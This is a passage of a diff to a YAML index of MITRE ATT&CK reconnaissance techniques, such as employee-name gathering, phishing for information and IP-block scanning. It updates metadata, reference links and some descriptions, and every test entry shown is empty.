         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -56931,8 +57620,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -56993,29 +57680,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -57024,15 +57692,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -57058,7 +57745,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -57076,47 +57763,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57125,19 +57775,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -57160,7 +57846,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -57176,8 +57862,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -57203,7 +57887,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -57219,8 +57903,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -57248,7 +57930,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -57264,12 +57946,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -57278,16 +57958,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -57300,8 +57980,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -57312,52 +57992,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -57379,7 +58057,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -57395,8 +58073,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -57422,7 +58098,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -57440,8 +58116,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -57463,7 +58137,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -57479,12 +58153,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -57494,17 +58166,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -57516,6 +58191,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -57526,7 +58202,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -57536,6 +58212,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -57548,6 +58228,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -57570,6 +58254,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -57577,9 +58265,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -57638,7 +58325,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -57658,7 +58345,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -57680,7 +58366,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -57696,12 +58382,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -57770,7 +58454,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -57818,31 +58502,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -57851,19 +58516,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
